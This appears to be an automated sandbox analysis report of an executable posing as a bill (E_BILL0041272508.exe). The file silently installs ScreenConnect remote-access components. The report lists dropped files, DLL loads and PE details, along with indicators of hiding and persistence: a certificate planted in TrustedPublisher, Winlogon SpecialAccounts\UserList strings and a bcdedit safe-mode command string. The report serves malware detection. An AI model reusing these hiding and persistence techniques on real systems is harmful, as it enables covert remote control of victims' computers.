                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: E_BILL0041272508.exeStatic PE information: certificate valid
                  Source: E_BILL0041272508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: E_BILL0041272508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: E_BILL0041272508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: E_BILL0041272508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: E_BILL0041272508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: E_BILL0041272508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: E_BILL0041272508.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: E_BILL0041272508.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: E_BILL0041272508.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC363000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2382809510.0000000002B12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435126842.0000000002241000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435049004.00000000020E0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.2378580945.000000000002D000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC47C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2383094950.0000000005022000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: E_BILL0041272508.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: E_BILL0041272508.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: E_BILL0041272508.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: E_BILL0041272508.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: E_BILL0041272508.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeUnpacked PE file: 7.2.ScreenConnect.ClientService.exe.5020000.1.unpack
                  Source: ScreenConnect.Client.dll.2.drStatic PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009B1000
                  Source: E_BILL0041272508.exeStatic PE information: real checksum: 0x1bda6 should be: 0x23878
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1BC0 push ecx; ret 0_2_009B1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD3467D2A5 pushad ; iretd 2_2_00007FFD3467D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD3479845E push eax; ret 2_2_00007FFD3479846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347A44B1 push esp; retf 2_2_00007FFD347A4619
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD347900BD pushad ; iretd 2_2_00007FFD347900C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD3479842E pushad ; ret 2_2_00007FFD3479845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFD34797D00 push eax; retf 2_2_00007FFD34797D1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFD34783F3A pushad ; retf 6_2_00007FFD34783F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFD3478401A push eax; iretd 6_2_00007FFD3478401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFD34782FDA pushad ; retf 6_2_00007FFD34782FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFD347830BA push eax; iretd 6_2_00007FFD347830BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFD347801FD push ebp; retf 6_2_00007FFD347801EC
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFD34780188 push ebp; retf 6_2_00007FFD347801EC
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFD347801D8 push ebp; retf 6_2_00007FFD347801EC
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeCode function: 8_2_05C09CF0 push esp; iretd 8_2_05C09CF1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeCode function: 8_2_05C08F70 push C304E3C5h; ret 8_2_05C08F80
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeCode function: 8_2_05C0E9A2 push esp; ret 8_2_05C0E9B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeCode function: 8_2_05C0E941 pushad ; ret 8_2_05C0E953
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A8AC94 pushad ; iretd 9_2_00007FFD34A8ACB5
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A8565B pushad ; retf 9_2_00007FFD34A85679
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A815D0 push eax; iretd 9_2_00007FFD34A815D1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A85670 pushad ; retf 9_2_00007FFD34A85679
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A858A7 push ss; iretd 9_2_00007FFD34A858B5
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A81199 push esp; iretd 9_2_00007FFD34A8119A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A8127D push ebx; iretd 9_2_00007FFD34A8127E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A813ED push edx; iretd 9_2_00007FFD34A813EE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A81449 push ecx; iretd 9_2_00007FFD34A8144A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34A81391 push edx; iretd 9_2_00007FFD34A81392
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (b044e727-8609-4a6c-b885-92d6249fd38a)Jump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.2382809510.0000000002B12000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2435126842.0000000002241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2435049004.00000000020E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
